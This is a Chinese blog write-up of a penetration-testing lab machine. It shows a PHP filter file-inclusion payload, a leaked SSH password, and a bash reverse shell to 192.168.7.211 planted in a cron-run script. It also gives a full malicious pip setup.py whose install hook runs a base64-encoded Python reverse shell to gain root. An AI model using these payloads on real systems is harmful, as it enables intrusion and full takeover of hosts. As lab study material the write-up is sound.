wakeanda 1

最新推荐文章于 2024-08-28 17:24:39 发布
最新推荐文章于 2024-08-28 17:24:39 发布
阅读量273 收藏 6
点赞数 3
文章标签: chrome 前端 安全 网络 测试工具 linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53626662/article/details/141193498
版权

一、主机发现

二、信息收集

1.目录扫描

2.访问首页

查看源代码,有为协议文件包含

拼接,得到

/?lang=php://filter/read=convert.base64-encode/resource=index

PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/

base64解码,得到

三、信息利用

1.ssh连接尝试,mamadou : Niamey4Ever227!!!

ssh mamadou@192.168.7.159 -p 3333

返回了一个python环境

四、提权

1.用python开启bash shell

import os
os.system("/bin/bash")

2.到/srv,发现.antivirus.py

3.cd 到/tmp 还有一个test文件,test文件每隔五分钟就会被修改一次,说明有一个定时任务在不断调用.antivirus.py

4.修改.antivirus.py文件

import os
os.system("echo 'bash -i >& /dev/tcp/192.168.7.211/7788 0>&1'|bash")

得到

5.在tmp目录下常见欸以文件,rhost为靶机ip

from setuptools import setup
from setuptools.command.install import install
import base64
import os
 
 
class CustomInstall(install):
  def run(self):
    install.run(self)
    RHOST = '192.168.7.211' 
 
    reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 7777; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOST
    encoded = base64.b64encode(reverse_shell)
    os.system('echo %s|base64 -d|bash' % encoded)
 
 
setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/0x00-0x00/fakepip',
      author='zc00l',
      author_email='andre.marques@esecurity.com.br',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

6.攻击机执行

sudo -H /usr/bin/pip install . --upgrade --force-reinstall

得到反弹的shell,是root权限

蓝天模糊
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Shell编程规范与变量
Amrian_robot的博客
08-28 673
● 由用户自己定义、修改和使用格式:变量名=变量值以字母或下划线开头,区分大小写示例:预定义变量:通常由编程语言或脚本解释器提供,并根据需要自动设置和更新,不能修改变量解释$*、$@表示命令或脚本要处理的参数"$*"把所有参数看成以空格分隔的一个字符串整体(单字符串)返回,代表"$1 $2 $3 $4""$@"把各个参数加上双引号分隔成n份的参数列表,每个参数作为一个字符串返回,代表"$1" "$2" "$3" "$4"$0表示当前执行的脚本或命令的名称$#
收藏夹里的“小网站”被误报违规不让上怎么办?如何将Chrome和Edge安装到 D 盘(含用户数据),重装系统也不会丢失收藏夹和密码?
楚门边境官方博客
08-28 461
那遇到这种误报应当怎么办呢?所以今天就来个有备无患,讲一下如何下载保存 Chrome 和 Edge 离线安装包,而且我还保存了几个旧版本,就算最新版不能用了也不用担心。虽说谷歌可能不会做太绝一棒子打死,不过万一哪天你要上的网站被谷歌给误报了,而你又不习惯用别的浏览器,那可真是闹心了。如果确实是违规网站,不让访问也没什么,但是很多都是误报啊,你这样直接来个大红横幅,还让人活不?
chrome打印dom节点不显示节点信息
RedXx
08-26 222
正常直接console dom节点。
chrome扩展程序本地打包
zk_tww的博客
08-23 634
本文为Chrome浏览器已安装的扩展程序打包为离线.crx文件,便于在无法访问Chrome商店场景下使用。
谷歌浏览器 Google Chrome 禁止扩展.crx更新
肉饼弟弟
08-23 417
谷歌浏览器禁止扩展更新
chrome cookie编辑
qq_32389095的博客
08-26 223
或者在chrome应用商店搜索: cookie editor。
谷歌chrome浏览器显示“版本太旧”又无法更新情况下,如何关闭“Chrome版本太旧”提示,包括直接启动Google浏览器,或者通过其他应用启动
学无止尽,谨言慎行!
08-23 290
由于在无互联网环境使用Google浏览器,所以无法进行升级,但每次启动都会有如下提示,作为有强迫症的我实在无法接受。
Chrome 渲染器中的对象转换到 RCE
技术超强的网络安全平台
08-24 753
在这种情况下,更新已弃用的映射会导致它意外地变成字典映射,特别是,生成的字典映射被假定输入是快速映射的代码使用。为了绕过 v8 堆沙箱,我修改了 v8 中 Blink 对象的包装器 API 对象,从而导致堆沙箱外部的对象发生类型混淆。,但由于堆沙箱的原因,它们实际上并未作为指针存储在 v8 对象中,而是作为查找表的索引,该查找表在 v8 堆中受到保护以防止被修改。,从而导致它访问红色框中的值,并将其用作属性的值。,然后使用伪造的双精度数组中的 OOB 读取原语来读取存储在此数组中的对象的地址。
Shell 脚本入门指南
最新发布
Javaxaiobai的博客
08-28 774
Shell 脚本是一种用于自动化任务的脚本语言,通常在 Unix/Linux 系统中使用。通过结合条件判断和循环来实现命令的自动运行以完成一些相对固定的操作。
JavaScript代码片段
weixin_66128399的博客
08-26 343
使用场景是:后端列表查询接口,某个字段前端不传,后端就不根据那个字段筛选,例如name不传的话,就只根据page和pageSize筛选,但是前端查询参数的时候(vue或者react)中,往往会这样定义。给后端发送数据的时候,要判断某个属性是不是空字符串,然后给后端拼参数,这块逻辑抽离出来就是cleanObject,代码实现如下。leading-true,trailing-true:在延时开始时就调用,延时结束后也会调用。//第一个参数指定位数,第二个字符串指定字符,都是可选参数,如果都不传,默认生成8位。
vue ref和reactive区别
灰海
08-25 1545
在第二个示例中,我们使用了reactive来创建一个名为state的响应式对象,它包含name和age两个属性。在模板中,我们通过{{ state.name }}和{{ state.age }}来显示state对象的属性值。在第一个示例中,我们使用了ref来创建一个名为count的响应式引用,它是一个简单的数字类型。在模板中,我们通过{{ count }}直接显示count的值,而不需要.value前缀,因为Vue的模板语法会自动处理ref的.value访问。
零基础5分钟上手亚马逊云科技-云原生架构设计
m0_66628975的博客
08-26 1711
欢迎来到小李哥全新亚马逊云科技AWS云计算知识学习系列,适用于任何无云计算或者亚马逊云科技技术背景的开发者,通过这篇文章大家零基础5分钟就能完全学会亚马逊云科技一个经典的服务开发架构方案。我会每天介绍一个基于亚马逊云科技AWS云计算平台的全球前沿云开发/架构技术解决方案,帮助大家快速了解国际上最热门的云计算平台亚马逊云科技AWS最佳实践,并应用到自己的日常工作里。
AI 大模型时代,对前端工程师有哪些机遇和挑战?
Z4400840的博客
08-28 461
AI 大模型时代为前端工程师带来了丰富的机遇,同时也带来了挑战。前端工程师需要积极适应这些变化,掌握新的技能,以抓住时代发展的红利。通过不断学习和提升技术水平,前端工程师可以在AI时代中发挥更大的作用,创造更多的价值。
前端宝典十六:深入浅出8大设计模式
franktaoge的博客
08-24 1468
本文主要探讨前端开发中的各种设计模式,主要分类有: - 单例模式 - 建造者模式 - 代理模式 - 装饰器模式 - 适配器模式 - 策略模式 - 观察者模式 - 发布订阅模式 通过对他们实际开发中的使用场景的解析,深入浅出的一起更全面直观的进行学习:
【React】React事件和HTML事件的区别
owo_ovo的博客
08-23 665
【React】React事件和HTML事件的区别
浏览器精度问题
m0_46281382的博客
08-25 650
浏览器如何解析后端返回的long类型的数据
前端:篮球投掷动画
懒羊羊大王的博客
08-23 1135
使用 H5 和 CSS3 实现的一个篮球投掷动画。 玩法:通过点击篮球所在的绿色(紫色)容器,实现篮球的投掷和回收。
WebRTC 实时通信:构建高效网页视频通话的秘诀
liuxin33445566的博客
08-24 755
WebRTC 是一个开源项目,由Google于2010年启动,旨在通过简单的API实现浏览器间的实时音视频通信。它允许开发者在网页应用中轻松集成音视频通话、文件共享、屏幕共享等功能。
vue-cli搭建项目过程
2302_78078800的博客
08-25 1016
前端js框架 vue-cli的使用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值